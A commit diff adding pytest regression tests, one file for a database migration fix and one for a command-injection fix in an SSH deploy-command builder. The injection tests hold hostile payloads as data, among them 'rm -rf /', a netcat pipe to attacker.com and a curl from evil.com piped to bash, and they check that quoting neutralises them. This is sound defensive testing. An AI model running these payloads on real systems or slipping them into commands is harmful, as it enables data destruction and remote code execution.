kin: auto-commit after pipeline

2026-03-17 20:16:10 +02:00 · 2026-03-17 20:16:10 +02:00 · c20eae01c1
commit c20eae01c1
parent 0e522e54a9
2 changed files with 493 additions and 0 deletions
--- a/tests/test_kin_102_regression.py
+++ b/tests/test_kin_102_regression.py
@@ -0,0 +1,308 @@
+"""Regression tests for KIN-102:
+Legacy test_command='make test' blocks autocommit in projects without Makefile.
+
+Root cause: projects with legacy test_command='make test' (old schema default) fail the
+auto-test runner because the project has no Makefile. This triggers an auto-fix loop
+that eventually marks the pipeline as failed + task as blocked, causing an early return
+in run_pipeline BEFORE _run_autocommit is reached.
+
+Fix: migration in core/db.py resets test_command='make test' → NULL for all projects,
+allowing auto-detection to find the real test framework or skip tests gracefully.
+
+Coverage:
+(1) Migration: test_command='make test' → NULL (KIN-102 fix)
+(2) Migration: other test_command values are NOT reset
+(3) Bug scenario: legacy 'make test' → pipeline blocked, autocommit skipped
+(4) Post-fix: NULL test_command + no framework → pipeline succeeds + autocommit called
+"""
+
+import json
+import os
+import pytest
+from unittest.mock import patch, MagicMock
+
+
+# ---------------------------------------------------------------------------
+# Fixtures
+# ---------------------------------------------------------------------------
+
+@pytest.fixture
+def conn():
+    """Yield a ':memory:' database seeded with project 'sharedbox' and one task."""
+    from core.db import init_db
+    from core import models
+
+    db = init_db(":memory:")
+    models.create_project(db, "sharedbox", "SharedBox", "~/projects/sharedbox",
+                          tech_stack=["typescript", "node"])
+    models.create_task(db, "SHAREDBOX-003", "sharedbox", "Setup DB",
+                       brief={"route_type": "backend_dev"})
+
+    # Code after the yield runs as fixture teardown once the test is done.
+    yield db
+    db.close()
+
+
+def _mock_agent_success():
+    """Return a MagicMock shaped like a zero-exit agent subprocess result."""
+    payload = {"status": "done", "changes": [], "notes": ""}
+    # MagicMock keyword arguments become attributes on the created mock.
+    completed = MagicMock(returncode=0, stdout=json.dumps(payload), stderr="")
+    return completed
+
+
+def _mock_make_test_fail():
+    """Return the failed test-run result the tests feed to _run_project_tests."""
+    return dict(
+        success=False,
+        output="make: No rule to make target `test'.  Stop.",
+        returncode=2)
+
+
+# ---------------------------------------------------------------------------
+# (1)-(2) Migration: test_command='make test' → NULL; other values are NOT reset
+# ---------------------------------------------------------------------------
+
+class TestKin102Migration:
+    """Checks that _migrate clears legacy 'make test' and leaves other values alone."""
+
+    def test_legacy_make_test_reset_to_null(self):
+        """_migrate rewrites a stored test_command='make test' to NULL (KIN-102 fix)."""
+        from core.db import init_db, _migrate
+        from core import models
+
+        query = "SELECT test_command FROM projects WHERE id='sbx'"
+        db = init_db(":memory:")
+        models.create_project(
+            db, "sbx", "SharedBox", "~/projects/sharedbox", tech_stack=["typescript"])
+        db.execute("UPDATE projects SET test_command='make test', auto_test_enabled=1 WHERE id='sbx'")
+        db.commit()
+
+        # Guard: the legacy value must really be stored before migrating.
+        before = db.execute(query).fetchone()[0]
+        assert before == "make test", "Pre-condition: test_command must be 'make test' before migration"
+
+        _migrate(db)
+        after = db.execute(query).fetchone()[0]
+        assert after is None, f"Expected NULL after migration, got {after!r}"
+        db.close()
+
+    def test_npm_test_not_reset_by_migration(self):
+        """A user-chosen test_command='npm test' survives _migrate unchanged."""
+        from core.db import init_db, _migrate
+        from core import models
+
+        db = init_db(":memory:")
+        models.create_project(
+            db, "sbx", "SharedBox", "~/projects/sharedbox", tech_stack=["typescript"])
+        db.execute("UPDATE projects SET test_command='npm test' WHERE id='sbx'")
+        db.commit()
+
+        _migrate(db)
+
+        stored = db.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()[0]
+        assert stored == "npm test", "Migration must not change test_command='npm test'"
+        db.close()
+
+    def test_pytest_not_reset_by_migration(self):
+        """A user-chosen test_command='pytest' survives _migrate unchanged."""
+        from core.db import init_db, _migrate
+        from core import models
+
+        db = init_db(":memory:")
+        models.create_project(
+            db, "sbx", "SharedBox", "~/projects/sharedbox", tech_stack=["python"])
+        db.execute("UPDATE projects SET test_command='pytest' WHERE id='sbx'")
+        db.commit()
+
+        _migrate(db)
+
+        stored = db.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()[0]
+        assert stored == "pytest", "Migration must not change test_command='pytest'"
+        db.close()
+
+    def test_null_test_command_stays_null_after_migration(self):
+        """A project whose test_command was never set is still NULL after _migrate."""
+        from core.db import init_db, _migrate
+        from core import models
+
+        db = init_db(":memory:")
+        # No UPDATE here: the test relies on create_project leaving test_command NULL.
+        models.create_project(
+            db, "sbx", "SharedBox", "~/projects/sharedbox", tech_stack=["typescript"])
+
+        _migrate(db)
+
+        stored = db.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()[0]
+        assert stored is None, "Migration must not touch NULL test_command"
+        db.close()
+
+    def test_migration_is_idempotent(self):
+        """Calling _migrate twice in a row raises nothing and still yields NULL."""
+        from core.db import init_db, _migrate
+        from core import models
+
+        db = init_db(":memory:")
+        models.create_project(
+            db, "sbx", "SharedBox", "~/projects/sharedbox", tech_stack=["typescript"])
+        db.execute("UPDATE projects SET test_command='make test' WHERE id='sbx'")
+        db.commit()
+
+        for _ in range(2):  # the second pass must be as safe as the first
+            _migrate(db)
+
+        stored = db.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()[0]
+        assert stored is None
+        db.close()
+
+
+# ---------------------------------------------------------------------------
+# (3) Bug scenario: legacy 'make test' → pipeline blocked, autocommit not called
+# ---------------------------------------------------------------------------
+
+class TestKin102BugScenario:
+    """Reproduces the KIN-102 failure path: a failing legacy 'make test' run."""
+
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_legacy_make_test_blocks_task(
+            self, mock_run, mock_tests, mock_autocommit, conn):
+        """Bug: a failing legacy 'make test' run fails the pipeline and blocks the task."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        models.update_project(
+            conn, "sharedbox", auto_test_enabled=True, test_command="make test")
+        mock_tests.return_value = _mock_make_test_fail()
+        mock_run.return_value = _mock_agent_success()
+        steps = [{"role": "backend_dev", "brief": "setup db"}]
+
+        with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}):
+            outcome = run_pipeline(conn, "SHAREDBOX-003", steps)
+
+        assert outcome["success"] is False
+        blocked_task = models.get_task(conn, "SHAREDBOX-003")
+        assert blocked_task["status"] == "blocked"
+
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_legacy_make_test_skips_autocommit(
+            self, mock_run, mock_tests, mock_autocommit, conn):
+        """Bug: once the legacy 'make test' run fails, _run_autocommit is never invoked."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        models.update_project(
+            conn, "sharedbox", auto_test_enabled=True, test_command="make test")
+        mock_tests.return_value = _mock_make_test_fail()
+        mock_run.return_value = _mock_agent_success()
+        steps = [{"role": "backend_dev", "brief": "setup db"}]
+
+        # NOTE(review): "0" presumably disables the auto-fix retries — confirm in runner.
+        with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}):
+            run_pipeline(conn, "SHAREDBOX-003", steps)
+
+        # run_pipeline is expected to return early on the failed test run,
+        # so the patched autocommit step must have seen no call at all.
+        mock_autocommit.assert_not_called()
+
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_blocked_reason_mentions_make_test(
+            self, mock_run, mock_tests, mock_autocommit, conn):
+        """The error returned by run_pipeline names 'make test' for diagnosability."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        models.update_project(
+            conn, "sharedbox", auto_test_enabled=True, test_command="make test")
+        mock_tests.return_value = _mock_make_test_fail()
+        mock_run.return_value = _mock_agent_success()
+        steps = [{"role": "backend_dev", "brief": "setup db"}]
+
+        with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}):
+            outcome = run_pipeline(conn, "SHAREDBOX-003", steps)
+
+        # A missing 'error' key counts as an empty reason, which fails the check.
+        reason = outcome.get("error", "")
+        assert "make test" in reason, (
+            f"Blocked reason must contain 'make test', got: {outcome.get('error')!r}"
+        )
+
+
+# ---------------------------------------------------------------------------
+# (4) Post-fix: NULL test_command + no framework → pipeline succeeds + autocommit called
+# ---------------------------------------------------------------------------
+
+class TestKin102PostFix:
+    """Covers the post-migration path: test_command is NULL and nothing is detected."""
+
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._detect_test_command")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_null_test_command_no_framework_pipeline_succeeds(
+            self, mock_run, mock_tests, mock_detect, mock_autocommit, conn):
+        """After fix: test_command=NULL and no detected framework → pipeline succeeds."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        # Post-migration state: the legacy command has already been reset to NULL.
+        models.update_project(
+            conn, "sharedbox", auto_test_enabled=True, test_command=None)
+        mock_run.return_value = _mock_agent_success()
+        # No test framework found (no Makefile/package.json).
+        mock_detect.return_value = None
+        steps = [{"role": "backend_dev", "brief": "setup db"}]
+
+        outcome = run_pipeline(conn, "SHAREDBOX-003", steps)
+
+        # With no command to run, the project test runner must not be invoked.
+        assert outcome["success"] is True
+        mock_tests.assert_not_called()
+
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._detect_test_command")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_null_test_command_no_framework_autocommit_called(
+            self, mock_run, mock_tests, mock_detect, mock_autocommit, conn):
+        """After fix: test_command=NULL and no framework → _run_autocommit IS called."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        models.update_project(
+            conn, "sharedbox", auto_test_enabled=True, test_command=None)
+        mock_run.return_value = _mock_agent_success()
+        mock_detect.return_value = None
+        steps = [{"role": "backend_dev", "brief": "setup db"}]
+
+        run_pipeline(conn, "SHAREDBOX-003", steps)
+
+        # No early return happens on this path, so the patched autocommit
+        # step must have been reached exactly one time.
+        mock_autocommit.assert_called_once()
+
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._detect_test_command")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_null_test_command_triggers_autodetect(
+            self, mock_run, mock_tests, mock_detect, mock_autocommit, conn):
+        """After fix: test_command=NULL makes run_pipeline call _detect_test_command."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        models.update_project(
+            conn, "sharedbox", auto_test_enabled=True, test_command=None)
+        mock_run.return_value = _mock_agent_success()
+        mock_detect.return_value = None
+        steps = [{"role": "backend_dev", "brief": "setup db"}]
+
+        run_pipeline(conn, "SHAREDBOX-003", steps)
+
+        # Auto-detection is consulted exactly once for the single pipeline run.
+        mock_detect.assert_called_once()
--- a/tests/test_kin_infra_006_regression.py
+++ b/tests/test_kin_infra_006_regression.py
@@ -0,0 +1,185 @@
+"""Regression tests for KIN-INFRA-006: command injection via deploy_path in SSH command.
+
+Root cause: _build_ssh_cmd() embedded deploy_path directly in f"cd {deploy_path} && {command}"
+without escaping, allowing shell metacharacters to be interpreted.
+
+Fix: shlex.quote(deploy_path) in core/deploy.py:_build_ssh_cmd(), line 54.
+
+Acceptance criteria:
+  1. deploy_path with shell metacharacters (';', '$(...)', '`...`', '|') is properly
+     escaped via shlex.quote — injected fragment does not leak into the command.
+  2. A legitimate path like '/srv/api' works normally (shlex.quote does not break it).
+  3. deploy_restart_cmd (admin-controlled command) is passed verbatim to SSH — NOT quoted
+     via shlex.quote (quoting a multi-word command would break remote execution).
+"""
+import shlex
+import pytest
+
+from core.deploy import _build_ssh_cmd, build_deploy_steps
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+def _ssh_project(deploy_path, **extra):
+    """Build the smallest project mapping these tests pass to _build_ssh_cmd.
+
+    Keys given in ``extra`` are applied last, so they override the defaults.
+    """
+    project = {"deploy_host": "10.0.0.1", "deploy_path": deploy_path}
+    return {**project, **extra}
+
+
+# ---------------------------------------------------------------------------
+# AC 1a — semicolon injection: '/srv/api; rm -rf /'
+# ---------------------------------------------------------------------------
+
+def test_semicolon_injection_in_deploy_path_is_escaped():
+    """AC1: a ';' inside deploy_path stays inside one shlex-quoted token."""
+    payload = "/srv/api; rm -rf /"
+    # The last list element carries the remote command string.
+    remote = _build_ssh_cmd(_ssh_project(payload), "git pull")[-1]
+
+    # The raw, unquoted form would let the remote shell run 'rm -rf /'.
+    assert "cd /srv/api; rm -rf /" not in remote, (
+        "Semicolon injection must be neutralised — raw path must not appear in command"
+    )
+    # The quoted form is what the fix is expected to emit.
+    assert shlex.quote(payload) in remote, (
+        "deploy_path must be wrapped by shlex.quote"
+    )
+
+
+# ---------------------------------------------------------------------------
+# AC 1b — command substitution: '$(whoami)'
+# ---------------------------------------------------------------------------
+
+def test_dollar_command_substitution_in_deploy_path_is_escaped():
+    """AC1: deploy_path containing '$(...)' must be quoted — no shell expansion."""
+    payload = "/srv/$(whoami)"
+    remote = _build_ssh_cmd(_ssh_project(payload), "git pull")[-1]
+    quoted = shlex.quote(payload)
+
+    assert "cd /srv/$(whoami) " not in remote, (
+        "$(...) substitution must not be left unquoted"
+    )
+    assert quoted in remote
+
+
+# ---------------------------------------------------------------------------
+# AC 1c — backtick command substitution: '`whoami`'
+# ---------------------------------------------------------------------------
+
+def test_backtick_injection_in_deploy_path_is_escaped():
+    """AC1: backticks in deploy_path reach the command only in shlex-quoted form."""
+    payload = "/srv/`whoami`"
+    remote = _build_ssh_cmd(_ssh_project(payload), "git pull")[-1]
+
+    # Unquoted backticks would be command substitution in the remote shell.
+    assert "cd /srv/`whoami` " not in remote
+    assert shlex.quote(payload) in remote
+
+
+# ---------------------------------------------------------------------------
+# AC 1d — pipe injection: '| nc attacker.com 4444'
+# ---------------------------------------------------------------------------
+
+def test_pipe_injection_in_deploy_path_is_escaped():
+    """AC1: a '|' in deploy_path must not open a second shell command."""
+    payload = "/srv/app | nc attacker.com 4444"
+    remote = _build_ssh_cmd(_ssh_project(payload), "git pull")[-1]
+
+    # Raw form first, then the exact token shlex.quote produces for the path.
+    assert "cd /srv/app | nc attacker.com 4444" not in remote
+    assert shlex.quote(payload) in remote
+
+
+# ---------------------------------------------------------------------------
+# AC 2 — legitimate path works normally
+# ---------------------------------------------------------------------------
+
+def test_legitimate_deploy_path_is_preserved():
+    """AC2: '/srv/api' (no special chars) shows up unchanged in the SSH command."""
+    remote = _build_ssh_cmd(_ssh_project("/srv/api"), "git pull")[-1]
+
+    assert "/srv/api" in remote, "Legitimate path must appear in command"
+    assert "git pull" in remote, "The deploy command must appear after cd"
+
+    # Expected shape: cd <path> && git pull — only the connective pieces are checked.
+    for fragment in ("cd", "&&"):
+        assert fragment in remote
+
+
+def test_legitimate_path_with_shlex_quote_is_unchanged():
+    """A path made only of shell-safe characters passes through shlex.quote as-is."""
+    plain_path = "/srv/api"
+    message = "shlex.quote must not alter a simple path (no extra quoting)"
+    assert shlex.quote(plain_path) == plain_path, message
+
+
+def test_ssh_cmd_structure_is_list_not_string():
+    """_build_ssh_cmd returns an argv-style list whose first element is 'ssh'."""
+    argv = _build_ssh_cmd(_ssh_project("/srv/api"), "git pull")
+    assert isinstance(argv, list), "SSH command must be a list (shell=False)"
+    assert argv[0] == "ssh"
+
+
+# ---------------------------------------------------------------------------
+# AC 3 — deploy_restart_cmd reaches SSH verbatim (not shlex-quoted)
+# ---------------------------------------------------------------------------
+
+def test_deploy_restart_cmd_passes_verbatim_to_ssh():
+    """AC3: deploy_restart_cmd is a multi-word shell command — must NOT be shlex-quoted."""
+    restart_cmd = "docker compose restart worker"
+    project = {
+        "deploy_host": "myserver", "deploy_path": "/srv/api",
+        "deploy_runtime": "docker", "deploy_restart_cmd": restart_cmd,
+    }
+    cmd = _build_ssh_cmd(project, restart_cmd)
+    full_cmd = cmd[-1]
+
+    # Multi-word command must appear verbatim, not as a single-quoted token
+    assert restart_cmd in full_cmd, (
+        "deploy_restart_cmd must appear verbatim in the SSH command"
+    )
+    # Substring check on purpose: comparing the whole string with != can never
+    # fail once a 'cd <path> &&' prefix is present, so it would miss a quoted command.
+    assert shlex.quote(restart_cmd) not in full_cmd, (
+        "deploy_restart_cmd must NOT be wrapped in shlex.quote — that would break remote execution"
+    )
+
+
+def test_build_deploy_steps_includes_restart_cmd():
+    """build_deploy_steps puts deploy_restart_cmd, unmodified, as its final step."""
+    restart_cmd = "systemctl restart myapp"
+    project = {"deploy_runtime": "python", "deploy_restart_cmd": restart_cmd}
+
+    steps = build_deploy_steps(project)
+    final_step = steps[-1]
+    assert final_step == restart_cmd, "restart_cmd must be last step, verbatim"
+
+
+# ---------------------------------------------------------------------------
+# Edge cases
+# ---------------------------------------------------------------------------
+
+def test_no_deploy_path_uses_command_directly():
+    """Without a deploy_path the remote command is exactly the given command."""
+    project = {"deploy_host": "myserver", "deploy_path": None}
+    remote = _build_ssh_cmd(project, "git pull")[-1]
+    assert "cd" not in remote
+    assert remote == "git pull"
+
+
+def test_ampersand_injection_in_deploy_path_is_escaped():
+    """deploy_path containing '&&' appears only inside its shlex-quoted form."""
+    payload = "/srv/app && curl http://evil.com/shell.sh | bash"
+    remote = _build_ssh_cmd(_ssh_project(payload), "git pull")[-1]
+    quoted = shlex.quote(payload)
+
+    # Strip the quoted token; anything left is text the shell would interpret.
+    outside_quotes = remote.replace(quoted, "")
+    assert "curl http://evil.com/shell.sh" not in outside_quotes
+
+    assert quoted in remote